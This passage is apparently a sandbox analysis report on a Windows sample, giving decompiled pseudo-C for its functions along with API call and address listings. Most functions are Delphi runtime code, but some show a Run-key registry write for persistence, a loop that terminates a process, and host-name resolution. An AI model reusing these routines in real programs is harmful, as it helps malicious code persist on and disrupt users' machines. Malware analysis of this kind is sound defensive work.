				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t74 = 0x40a49c;
				_t86 = 0x40a49c;
				_t83 =  *0x406188; // 0x4061d4
				if(E004032A0(_t87, _t83) != 0) {
					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
					_t69 = E00407764(_t74, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E00407764(_v8, _t86);
			}































    0x0040a31c
    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A31A, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x454660; // 0x400000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0040A310(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
				_t75 = 0x40a49c;
				_t89 = 0x40a49c;
				_t85 =  *0x406188; // 0x4061d4
				if(E004032A0(_t92, _t85) != 0) {
					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
					_t69 = E00407764(_t75, 0x40a49c);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x40a4a0;
					}
				}
				_t51 =  *0x453108; // 0x405f28
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x454660; // 0x400000
				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
				E00403064( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E00407764(_v8, _t89);
			}































    0x0040a328
    0x0040a32b
    0x0040a32d
    0x0040a339
    0x0040a348
    0x0040a372
    0x0040a378
    0x0040a384
    0x0040a389
    0x0040a38f
    0x0040a38f
    0x0040a3ad
    0x0040a3b2
    0x0040a3b7
    0x0040a3be
    0x0040a3cb
    0x0040a3d5
    0x0040a3d9
    0x0040a3e0
    0x0040a3e9
    0x0040a3e9
    0x0040a3e0
    0x0040a3fa
    0x0040a3ff
    0x0040a403
    0x0040a40e
    0x0040a41b
    0x0040a426
    0x0040a42c
    0x0040a439
    0x0040a43f
    0x0040a449
    0x0040a44f
    0x0040a456
    0x0040a45c
    0x0040a463
    0x0040a469
    0x0040a485
    0x0040a498

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00402F8C, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49
    C-Code - Quality: 65%
    			E00402F8C() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x419020 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x419020; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x419020 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402FFD);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x403004);
					return RegCloseKey(_v8);
				}
			}












    0x00402f8d
    0x00402f8f
    0x00402f99
    0x00402fb5
    0x00403004
    0x00403016
    0x00403019
    0x00403022
    0x00402fb7
    0x00402fb9
    0x00402fba
    0x00402fbf
    0x00402fc2
    0x00402fc5
    0x00402fe1
    0x00402fe8
    0x00402feb
    0x00402fee
    0x00402ffc
    0x00402ffc

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A038, Relevance: 7.6, APIs: 5, Instructions: 50
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
				char _v8;
				intOrPtr* _t18;
				intOrPtr _t26;
				void* _t27;
				long _t29;
				intOrPtr _t32;
				void* _t33;

				_t33 = __eflags;
				_push(0);
				_push(_t32);
				_push(0x40a0cf);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32;
				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
				_t29 = E00407174(0x40a0e4, 1, _t33);
				if(_t29 + 0xfffffffd - 3 < 0) {
					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
					_t27 = 7;
					_t18 = 0x454764;
					do {
						 *_t18 = 0xffffffff;
						_t18 = _t18 + 4;
						_t27 = _t27 - 1;
					} while (_t27 != 0);
					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
				}
				_pop(_t26);
				 *[fs:eax] = _t26;
				_push(E0040A0D6);
				return E00403E88( &_v8);
			}










    0x0040a038
    0x0040a03b
    0x0040a040
    0x0040a041
    0x0040a046
    0x0040a049
    0x0040a05f
    0x0040a071
    0x0040a07b
    0x0040a08b
    0x0040a090
    0x0040a095
    0x0040a09a
    0x0040a09a
    0x0040a0a0
    0x0040a0a3
    0x0040a0a3
    0x0040a0b4
    0x0040a0b4
    0x0040a0bb
    0x0040a0be
    0x0040a0c1
    0x0040a0ce

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040A0E8, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40a2b2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E00403E88(__edx);
				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E00404148(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x419108], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E00404150(_t122, 0x40a30c);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E00404070();
												E00404150(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E00404150(_t122, 0x40a300);
										_t92 = _t92 + 1;
									}
								} else {
									E00404150(_t122, 0x40a2ec);
									_t92 = _t92 + 3;
								}
							} else {
								E00404150(_t122, 0x40a2d8);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040B04C(_t124, _t92);
							E004043A8(_t124, _v8, _t92,  &_v20);
							E00404150(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x45473c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00403EDC(_t122, _t124);
					} else {
						while(_t92 <= E00404148(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404070();
									E00404150(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040A2B9);
				return E00403EAC( &_v24, 4);
			}























    0x0040a0e8
    0x0040a0ed
    0x0040a0ee
    0x0040a0ef
    0x0040a0f0
    0x0040a0f1
    0x0040a0f5
    0x0040a0f7
    0x0040a0fb
    0x0040a0fc
    0x0040a101
    0x0040a104
    0x0040a107
    0x0040a10e
    0x0040a126
    0x0040a13e
    0x0040a288
    0x0040a28a
    0x0040a28f
    0x0040a291
    0x00000000
    0x00000000
    0x0040a1a7
    0x0040a1ac
    0x0040a1b3
    0x0040a1f1
    0x0040a1f6
    0x0040a1f8
    0x0040a217
    0x0040a21c
    0x0040a21e
    0x0040a23f
    0x0040a244
    0x0040a246
    0x0040a25b
    0x0040a25b
    0x0040a25d
    0x0040a263
    0x0040a26a
    0x0040a25f
    0x0040a25f
    0x0040a261
    0x0040a278
    0x0040a282
    0x00000000
    0x00000000
    0x00000000
    0x0040a261
    0x0040a248
    0x0040a24f
    0x0040a254
    0x0040a254
    0x0040a220
    0x0040a227
    0x0040a22c
    0x0040a22c
    0x0040a1fa
    0x0040a201
    0x0040a206
    0x0040a206
    0x0040a287
    0x0040a287
    0x0040a1b5
    0x0040a1be
    0x0040a1cc
    0x0040a1d6
    0x0040a1db
    0x0040a1db
    0x0040a1b3
    0x0040a144
    0x0040a144
    0x0040a149
    0x0040a14c
    0x0040a15a
    0x0040a156
    0x0040a156
    0x0040a156
    0x0040a15e
    0x0040a199
    0x0040a160
    0x0040a185
    0x0040a166
    0x0040a166
    0x0040a168
    0x0040a16a
    0x0040a16c
    0x0040a175
    0x0040a17f
    0x0040a17f
    0x0040a16c
    0x0040a184
    0x0040a184
    0x0040a184
    0x0040a190
    0x0040a15e
    0x0040a297
    0x0040a299
    0x0040a29c
    0x0040a29f
    0x0040a2b1

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0041763C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
				char _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				void* _t22;
				void* _t35;
				intOrPtr* _t38;
				void* _t47;

				_t47 = __ecx;
				_t38 = __edx;
				E00403E88(__ecx);
				if(_t38 == 0) {
					return E00403EDC(_t47, "0.0.0.0");
				}
				if( *_t38 + 0xd0 - 0xa >= 0) {
					_t22 = E00404348(_t38);
					_push(_t22);
					L0040C4F8();
					if(_t22 != 0) {
						_v48 = 0;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						_v24 = 0;
						_v20 = 0;
						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
					}
				} else {
					_t35 = E00404348(_t38);
					_push(_t35);
					L0040C4C8();
					_t22 = _t35 + 1;
					if(_t22 != 0) {
						return E00403EDC(_t47, _t38);
					}
				}
				return _t22;
			}















    0x00417642
    0x00417644
    0x00417648
    0x0041764f
    0x00000000
    0x004176e4
    0x0041765b
    0x0041767a
    0x0041767f
    0x00417680
    0x00417687
    0x00417695
    0x00417699
    0x004176a3
    0x004176a7
    0x004176b1
    0x004176b5
    0x004176bf
    0x004176c3
    0x00000000
    0x004176d6
    0x0041765d
    0x0041765f
    0x00417664
    0x00417665
    0x0041766a
    0x0041766b
    0x00000000
    0x00417671
    0x0041766b
    0x004176ef

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 004185E8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				char _v20;
				int _t28;
				char* _t41;
				intOrPtr _t47;
				void* _t51;

				_v20 = 0;
				_v12 = __edx;
				_v8 = __eax;
				E00404338(_v8);
				E00404338(_v12);
				_push(_t51);
				_push(0x418692);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
				_t41 = E00404348(_v12);
				E00404080( &_v20, _t41);
				_t28 = E00404148(_v20);
				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
				RegCloseKey(_v16);
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00418699);
				E00403E88( &_v20);
				return E00403EAC( &_v12, 2);
			}











    0x004185f1
    0x004185f4
    0x004185f7
    0x004185fd
    0x00418605
    0x0041860c
    0x0041860d
    0x00418612
    0x00418615
    0x0041862d
    0x0041863a
    0x00418641
    0x00418649
    0x00418661
    0x0041866a
    0x00418671
    0x00418674
    0x00418677
    0x0041867f
    0x00418691

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00418B04, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34
    C-Code - Quality: 72%
    			E00418B04() {
				char _v8;
				intOrPtr* _t3;
				long _t13;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t26;

				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
				_push(0);
				_t26 = 0;
				_push(_t24);
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				L2:
				E00403F20( &_v8,  *0x454a5c);
				E00418A14(0x454a5c, _t20, _t21);
				E00404294(_v8,  *0x454a5c);
				if(_t26 != 0) {
					_t26 = E00418560(_t26);
					if(_t26 == 0) {
						_t13 =  *0x454a60; // 0x0
						TerminateProcess(OpenProcess(1, 0, _t13), 0);
					}
				}
				Sleep("h N");
				goto L2;
			}










    0x00418b06
    0x00418b0f
    0x00418b17
    0x00418b19
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00000000

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00418B0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
    C-Code - Quality: 75%
    			E00418B0C() {
				char _v8;
				long _t10;
				void* _t17;
				void* _t18;
				intOrPtr _t20;
				void* _t21;

				_push(0);
				_t21 = 0;
				_push(0x418b82);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				while(1) {
					E00403F20( &_v8,  *0x454a5c);
					E00418A14(0x454a5c, _t17, _t18);
					E00404294(_v8,  *0x454a5c);
					if(_t21 != 0) {
						_t21 = E00418560(_t21);
						if(_t21 == 0) {
							_t10 =  *0x454a60; // 0x0
							TerminateProcess(OpenProcess(1, 0, _t10), 0);
						}
					}
					Sleep("h N");
				}
			}









    0x00418b0f
    0x00418b17
    0x00418b1a
    0x00418b1f
    0x00418b22
    0x00418b25
    0x00418b2a
    0x00418b2f
    0x00418b39
    0x00418b3e
    0x00418b45
    0x00418b47
    0x00418b4b
    0x00418b5b
    0x00418b5b
    0x00418b47
    0x00418b65
    0x00418b65

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 0040BAA0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
    C-Code - Quality: 100%
    			E0040BAA0() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x41912c = _t1;
				}
				if( *0x41912c == 0) {
					 *0x41912c = E004076D4;
					return E004076D4;
				}
				return _t1;
			}





    0x0040baa6
    0x0040baab
    0x0040baaf
    0x0040bab7
    0x0040babc
    0x0040babc
    0x0040bac8
    0x0040bacf
    0x00000000
    0x0040bacf
    0x0040bad5

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.1492263131.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_400000_obtG43AWHP.jbxd
    Function 00409161, Relevance: 6.4, Strings: 5, Instructions: 128
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
				signed int _t166;
				signed int _t168;
				signed int _t170;
				signed int _t172;
				signed int _t181;
				void* _t183;
				intOrPtr _t224;
				intOrPtr _t227;
				signed int _t232;
				void* _t250;
				void* _t252;
				intOrPtr _t272;
				signed int _t281;
				void* _t282;

				L0:
				while(1) {
					L0:
					E004089D8(_t282);
					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
					if(E004077C0(_t281, 5, 0x409418) != 0) {
						_t166 = E004077C0(_t281, 3, 0x409420);
						__eflags = _t166;
						if(_t166 != 0) {
							_t168 = E004077C0(_t281, 4, 0x409424);
							__eflags = _t168;
							if(_t168 != 0) {
								_t170 = E004077C0(_t281, 4, 0x40942c);
								__eflags = _t170;
								if(_t170 != 0) {
									_t172 = E004077C0(_t281, 3, 0x409434);
									__eflags = _t172;
									if(_t172 != 0) {
										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									} else {
										E004089A0(_t282);
										_pop(_t250);
										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
									}
								} else {
									E004089A0(_t282);
									_pop(_t252);
									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								}
							} else {
								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
								if( *((short*)(_t282 - 0x16)) >= 0xc) {
									_t224 =  *0x454694; // 0x0
									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
								} else {
									_t227 =  *0x454690; // 0x0
									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
								}
								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
								 *((char*)(_t282 - 0x1e)) = 1;
							}
						} else {
							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
							if( *((short*)(_t282 - 0x16)) >= 0xc) {
								__eflags = _t281;
							}
							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
							 *((char*)(_t282 - 0x1e)) = 1;
						}
					} else {
						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
						if( *((short*)(__ebp - 0x16)) >= 0xc) {
							__esi = __esi + 3;
							__eflags = __esi;
						}
						__eax =  *(__ebp + 8);
						__edx = 2;
						__eax = __esi;
						__eax = E004088C4(2,  *(__ebp + 8));
						 *(__ebp - 4) =  *(__ebp - 4) + 4;
						 *((char*)(__ebp - 0x1e)) = 1;
					}
					while(1) {
						L109:
						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
						if(_t164 == 0) {
							break;
						}
						L1:
						 *(_t282 - 5) = _t164;
						asm("bt [0x419108], eax");
						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
							_t181 =  *(_t282 - 5);
							__eflags = _t181 + 0x9f - 0x1a;
							if(_t181 + 0x9f - 0x1a < 0) {
								_t181 = _t181 - 0x20;
								__eflags = _t181;
							}
							L5:
							__eflags = _t181 + 0xbf - 0x1a;
							if(_t181 + 0xbf - 0x1a >= 0) {
								L10:
								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
								__eflags = _t183 - 0x38;
								if(_t183 > 0x38) {
									L108:
									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
									continue;
								}
								L11:
								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
									case 0:
										goto L108;
									case 1:
										L12:
										E00408974(_t282);
										E004089A0(_t282);
										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
										} else {
